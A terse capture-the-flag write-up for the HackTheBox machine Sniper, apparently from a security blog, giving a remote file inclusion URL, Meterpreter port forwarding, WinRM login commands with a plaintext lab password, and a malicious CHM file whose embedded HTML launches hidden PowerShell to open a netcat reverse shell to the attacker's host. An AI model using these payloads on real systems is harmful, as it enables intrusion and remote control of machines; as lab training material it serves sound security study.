Sniper @ HackTheBox

28Mar

Sniper @ HackTheBox

By CTF , , ,

Sniper is a 30-point machine on HackTheBox that involves abusing a remote file inclusion and uploading a crafted chm file which is opened automatically by the local administrator.

Notes

Remote File Inclusion:

http://10.10.10.151/blog/?lang=//<ip>/share/xct.php

Meterpreter port forward:

portfwd add -l 8000 -p 5985 -r 10.10.10.151

WinRM:

set winrm/config/client @{TrustedHosts="*"}
Enable-WSManCredSSP -Role "Client" -DelegateComputer "*"
$user = 'Chris'
$pass = ConvertTo-SecureString -AsPlainText '36mEAhz/B8xQ~2VM' -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
New-PSSession -URI http://localhost:8000/wsman -Credential $cred
Enter-PSSession -id <id>

Generate CHM-Payload:

Out-CHM -Payload "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Payload:

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile c:\programdata\nc.exe -e cmd.exe <ip> <port>">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>

Share this post

Author

Related Posts

24Jul

Drupalgeddon & Sudo Snap Install – Armageddon @ HackTheBox

We are solving Armageddon, a really easy 20-point machine on HackTheBox that involves the drupalgeddon exploit, reading & cracking a... read more

02Jun

P.O.O. Endgame @ HackTheBox

P.O.O. Endgame is one of HackTheBox’s endgame labs and was just retired. It involves exploiting SQL Server Links & Active... read more

17Jul

LFI to RCE, Sticky Notes & SQLi – Breadcrumbs @ HackTheBox

We are solving Breadcrumbs, a 40-point Windows machine on HackTheBox. For user, we exploit an LFI to read PHP source... read more

16Mar

Carrier @ HackTheBox

Carrier is a nice, medium difficulty machine on hackthebox.eu featuring information retrieval via snmp, command injection and bgp hijacking. The... read more

10Jun

Smasher 2 @ HackTheBox

Smasher2 is a difficult 50 points machine on hackthebox, involving some guessing to get the user flag (because the author... read more

28Aug

FTP to Web Shell & SeImpersonate – AuthBy @ PG Practice

AuthBy is a medium difficulty Windows machine on PG Practice. It involves getting FTP access to the web root of... read more

10Apr

APT @ HackTheBox

APT is a 50-point machine on HackTheBox which involves getting the IPv6 Address via MS-RPC, credential spraying, and reading the... read more

10Jul

Electron-Updater RCE – Atom @ HackTheBox

We are going to solve Atom, a 30-point machine on HackTheBox where we'll analyze an electron app and exploit its... read more

09Oct

SSRF into Responder, gMSA Password & SeRestorePrivilege – Heist @ PG Practice

We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading... read more

22May

Getting Access through the Helpdesk – Delivery @ HackTheBox

We are going to solve Delivery, a 20-point machine on HackTheBox. For user, we will bypass email verification on a... read more